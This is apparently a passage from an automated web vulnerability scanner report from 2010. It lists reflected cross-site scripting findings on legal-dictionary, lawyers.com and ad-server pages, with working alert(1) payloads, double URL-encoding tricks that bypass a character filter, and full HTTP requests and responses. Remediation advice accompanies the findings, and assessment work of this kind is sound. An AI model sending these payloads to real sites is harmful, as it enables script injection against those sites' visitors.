There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /PATENTSCOPE-Glossary1ac9f%253cscript%253ealert%25281%2529%253c%252fscript%253eb032d614600/ HTTP/1.1 Host: patentandtrademark.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:51 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 23308
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4c16d%253cscript%253ealert%25281%2529%253c%252fscript%253eedb06a41a53 was submitted in the REST URL parameter 1. This input was echoed as 4c16d<script>alert(1)</script>edb06a41a53 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /PCT-(Patent-Cooperation-Treaty4c16d%253cscript%253ealert%25281%2529%253c%252fscript%253eedb06a41a53 HTTP/1.1 Host: patentandtrademark.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:16:46 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 20970
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43bc9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e81a198545f7 was submitted in the REST URL parameter 1. This input was echoed as 43bc9"><script>alert(1)</script>81a198545f7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /PCT-(Patent-Cooperation-Treaty43bc9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e81a198545f7 HTTP/1.1 Host: patentandtrademark.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:16:11 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 20664
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
...[SNIP]... <meta name="description" content="PCT-(Patent-Cooperation-Treaty43bc9"><script>alert(1)</script>81a198545f7 according to the free Patent & Trademark Dictionaries. This online database of patent and trademark dictionaries offers you a quick reference tool on the field of intellectual property law." /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload fb5b9%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1b08f5908ce was submitted in the REST URL parameter 1. This input was echoed as fb5b9</title><script>alert(1)</script>1b08f5908ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /PCT-(Patent-Cooperation-Treatyfb5b9%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1b08f5908ce HTTP/1.1 Host: patentandtrademark.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:18:00 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 20892
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
...[SNIP]... <title>PCT-(Patent-Cooperation-Treatyfb5b9</title><script>alert(1)</script>1b08f5908ce meaning | Patent & Trademark Dictionaries</title> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4215f%2527%253balert%25281%2529%252f%252f3a445af1c45 was submitted in the REST URL parameter 1. This input was echoed as 4215f';alert(1)//3a445af1c45 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /PCT-(Patent-Cooperation-Treaty)-Glossary4215f%2527%253balert%25281%2529%252f%252f3a445af1c45/ HTTP/1.1 Host: patentandtrademark.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:34 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 23162
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
...[SNIP]... alue; } if (document.myform.operation[2] && document.myform.operation[2].checked == true) { var loc = 'http://patentandtrademark.legaldictionaries.org/PCT-(Patent-Cooperation-Treaty)-Glossary4215f';alert(1)//3a445af1c45/' + document.getElementById('define').term.value; } } var myExp = /\s/g; var loc2 = loc.replace(myExp,"_"); location = loc2; }
function bar(e){ var keycode; if (window.event) keycod ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc583%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6627326016e was submitted in the REST URL parameter 1. This input was echoed as dc583"><script>alert(1)</script>6627326016e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /PCT-(Patent-Cooperation-Treaty)-Glossarydc583%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6627326016e/ HTTP/1.1 Host: patentandtrademark.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:22 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 24495
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fe009%253cscript%253ealert%25281%2529%253c%252fscript%253e5b0f5a47fd1 was submitted in the REST URL parameter 1. This input was echoed as fe009<script>alert(1)</script>5b0f5a47fd1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /PCT-(Patent-Cooperation-Treaty)-Glossaryfe009%253cscript%253ealert%25281%2529%253c%252fscript%253e5b0f5a47fd1/ HTTP/1.1 Host: patentandtrademark.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:51 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 24208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload d69e8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecdc7d797cbe was submitted in the REST URL parameter 1. This input was echoed as d69e8</title><script>alert(1)</script>cdc7d797cbe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /PCT-(Patent-Cooperation-Treaty)-Glossaryd69e8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecdc7d797cbe/ HTTP/1.1 Host: patentandtrademark.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:16:32 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 24804
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5007%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6288192aa19 was submitted in the REST URL parameter 1. This input was echoed as c5007"><script>alert(1)</script>6288192aa19 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /USPTO-Patent-and-Trademark-Glossaryc5007%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6288192aa19/ HTTP/1.1 Host: patentandtrademark.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:22 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 24276
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3ad8e%253cscript%253ealert%25281%2529%253c%252fscript%253edecef8523e5 was submitted in the REST URL parameter 1. This input was echoed as 3ad8e<script>alert(1)</script>decef8523e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /USPTO-Patent-and-Trademark-Glossary3ad8e%253cscript%253ealert%25281%2529%253c%252fscript%253edecef8523e5/ HTTP/1.1 Host: patentandtrademark.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:51 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 23998
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
...[SNIP]... </script>decef8523e5/">USPTO Patent & Trademark Glossary3ad8e<script>alert(1)</script>decef8523e5</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb721%2527%253balert%25281%2529%252f%252fa9ac756dc6a was submitted in the REST URL parameter 1. This input was echoed as fb721';alert(1)//a9ac756dc6a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /USPTO-Patent-and-Trademark-Glossaryfb721%2527%253balert%25281%2529%252f%252fa9ac756dc6a/ HTTP/1.1 Host: patentandtrademark.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:34 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 22940
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
...[SNIP]... erm.value; } if (document.myform.operation[2] && document.myform.operation[2].checked == true) { var loc = 'http://patentandtrademark.legaldictionaries.org/USPTO-Patent-and-Trademark-Glossaryfb721';alert(1)//a9ac756dc6a/' + document.getElementById('define').term.value; } } var myExp = /\s/g; var loc2 = loc.replace(myExp,"_"); location = loc2; }
function bar(e){ var keycode; if (window.event) keycod ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload ca830%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06ba4666abd was submitted in the REST URL parameter 1. This input was echoed as ca830</title><script>alert(1)</script>06ba4666abd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /USPTO-Patent-and-Trademark-Glossaryca830%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06ba4666abd/ HTTP/1.1 Host: patentandtrademark.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:16:31 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 24587
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload 2229e<script>alert(1)</script>c9838882a4f was submitted in the slotname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gampad/ads?correlator=1291038775452&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-8386094022769928&slotname=Vertical_babylon_DL_Banner_910x1902229e<script>alert(1)</script>c9838882a4f&page_slots=Vertical_babylon_DL_Banner_910x190&cookie_enabled=1&ga_vid=1057535273.1291038775&ga_sid=1291038775&ga_hid=1330660784&url=http%3A%2F%2Fwebcache.googleusercontent.com%2Fsearch%3Fq%3Dcache%3AcyhBgjTvtJEJ%3Adivorcelaw.legaldictionaries.org%2FMassachusetts-Divorce-Law-Dictionary%2FAbandonment%2Bmassachusetts%2Bdivorce%2Babandonment%26cd%3D2%26hl%3Den%26ct%3Dclnk%26gl%3Dus&lmt=NaN&dt=1291038775457&cc=40&biw=1597&bih=817&ifi=1&adk=3513650165&u_tz=-360&u_his=1&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=6&u_nmime=40&flash=10.1.103 HTTP/1.1 Host: pubads.g.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|2299144/842048/14940,996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Mon, 29 Nov 2010 17:00:29 GMT Server: gfp-be Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 2728
GA_googleSetAdContentsBySlotForSync({"Vertical_babylon_DL_Banner_910x1902229e<script>alert(1)</script>c9838882a4f":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f ...[SNIP]...
1.86. http://research.lawyers.com/Massachusetts/Divorce-in-Massachusetts.html/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://research.lawyers.com
Path:
/Massachusetts/Divorce-in-Massachusetts.html/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be6b0"><script>alert(1)</script>282e81ac04f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Massachusetts/Divorce-in-Massachusetts.html/x22?be6b0"><script>alert(1)</script>282e81ac04f=1 HTTP/1.1 Host: research.lawyers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:36 GMT Server: www.lawyers.com 9999 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 92660 X-RE-Ref: 1 947343742 P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC" Set-Cookie: PageHistory=; domain=.lawyers.com; path=/ Set-Cookie: quovaresult=us|dallas|tx; domain=.lawyers.com; expires=Mon, 28-Feb-2011 17:15:37 GMT; path=/ Set-Cookie: year=dXNlcklkPTE4NzkzNTY2NzY=; domain=.lawyers.com; expires=Tue, 29-Nov-2011 17:15:37 GMT; path=/ Set-Cookie: hour=c2Vzc2lvbklkPTIwMTEzOTQwNzY=; domain=.lawyers.com; expires=Mon, 29-Nov-2010 18:15:37 GMT; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80dbb"><script>alert(1)</script>829859abfe2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /Massachusetts/80dbb"><script>alert(1)</script>829859abfe2/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dX6LzTPDsK4T7lwfX0JTTDA\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CCgQ6QUoAA\\x26amp;q\\x3dmassachusetts+divorce\\x26amp;usg\\x3dAFQjCNHl-UvWRLQMrvEtCe7ezrKTXtNYiw\\x22\\x3eMassachusetts\\x3c/a\\x3e\\x3c/span\\x3e\\x3c/cite\\x3e HTTP/1.1 Host: research.lawyers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:35 GMT Server: www.lawyers.com 9999 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 130018 X-RE-Ref: 1 946154444 P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC" Set-Cookie: PageHistory=; domain=.lawyers.com; path=/ Set-Cookie: quovaresult=us|dallas|tx; domain=.lawyers.com; expires=Mon, 28-Feb-2011 17:15:35 GMT; path=/ Set-Cookie: year=dXNlcklkPTE4NzkzNTY2NjQ=; domain=.lawyers.com; expires=Tue, 29-Nov-2011 17:15:35 GMT; path=/ Set-Cookie: hour=c2Vzc2lvbklkPTIwMTEzOTQwNjQ=; domain=.lawyers.com; expires=Mon, 29-Nov-2010 18:15:35 GMT; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3acb8"><script>alert(1)</script>c80aadc5560 was submitted in the term parameter. This input was echoed as 3acb8\"><script>alert(1)</script>c80aadc5560 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /glossary/search.html?term=asset3acb8"><script>alert(1)</script>c80aadc5560&x=0&y=0 HTTP/1.1 Host: research.lawyers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:45 GMT Server: LexisNexis Vary: X-Forwarded-Host Accept-Ranges: bytes X-Powered-By: PHP/4.4.3 Content-Type: text/html; charset=UTF-8 Set-Cookie: year=deleted; expires=Sun, 29 Nov 2009 17:15:45 GMT; path=/; domain=.lawyers.com Set-Cookie: month=deleted; expires=Sun, 29 Nov 2009 17:15:45 GMT; path=/; domain=.lawyers.com Set-Cookie: hour=deleted; expires=Sun, 29 Nov 2009 17:15:45 GMT; path=/; domain=.lawyers.com Set-Cookie: minute=deleted; expires=Sun, 29 Nov 2009 17:15:45 GMT; path=/; domain=.lawyers.com Set-Cookie: session=deleted; expires=Sun, 29 Nov 2009 17:15:45 GMT; path=/; domain=.lawyers.com Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Asset3acb8\">< ...[SNIP]... <meta name="description" content="Your search for asset3acb8\"><script>alert(1)</script>c80aadc5560 found 0 legal terms."> ...[SNIP]...
The value of the term request parameter is copied into the HTML document as text between TITLE tags. The payload e121c</title><script>alert(1)</script>ab02bf8558d was submitted in the term parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /glossary/search.html?term=assete121c</title><script>alert(1)</script>ab02bf8558d&x=0&y=0 HTTP/1.1 Host: research.lawyers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:50 GMT Server: LexisNexis Vary: X-Forwarded-Host Accept-Ranges: bytes X-Powered-By: PHP/4.4.3 Content-Type: text/html; charset=UTF-8 Set-Cookie: year=deleted; expires=Sun, 29 Nov 2009 17:15:49 GMT; path=/; domain=.lawyers.com Set-Cookie: month=deleted; expires=Sun, 29 Nov 2009 17:15:49 GMT; path=/; domain=.lawyers.com Set-Cookie: hour=deleted; expires=Sun, 29 Nov 2009 17:15:49 GMT; path=/; domain=.lawyers.com Set-Cookie: minute=deleted; expires=Sun, 29 Nov 2009 17:15:49 GMT; path=/; domain=.lawyers.com Set-Cookie: session=deleted; expires=Sun, 29 Nov 2009 17:15:49 GMT; path=/; domain=.lawyers.com Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Assete121c</title><script>alert(1)</script>ab02bf8558d Returned the Following Results - Lawyers.com</title> ...[SNIP]...
The value of the term request parameter is copied into the HTML document as plain text between tags. The payload 95d68<script>alert(1)</script>f09d2303893 was submitted in the term parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /glossary/search.html?term=asset95d68<script>alert(1)</script>f09d2303893&x=0&y=0 HTTP/1.1 Host: research.lawyers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:47 GMT Server: LexisNexis Vary: X-Forwarded-Host Accept-Ranges: bytes X-Powered-By: PHP/4.4.3 Content-Type: text/html; charset=UTF-8 Set-Cookie: year=deleted; expires=Sun, 29 Nov 2009 17:15:46 GMT; path=/; domain=.lawyers.com Set-Cookie: month=deleted; expires=Sun, 29 Nov 2009 17:15:46 GMT; path=/; domain=.lawyers.com Set-Cookie: hour=deleted; expires=Sun, 29 Nov 2009 17:15:46 GMT; path=/; domain=.lawyers.com Set-Cookie: minute=deleted; expires=Sun, 29 Nov 2009 17:15:46 GMT; path=/; domain=.lawyers.com Set-Cookie: session=deleted; expires=Sun, 29 Nov 2009 17:15:46 GMT; path=/; domain=.lawyers.com Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Asset95d68<scr ...[SNIP]... <h1>Asset95d68<script>alert(1)</script>f09d2303893 - 0 Legal Terms</h1> ...[SNIP]...
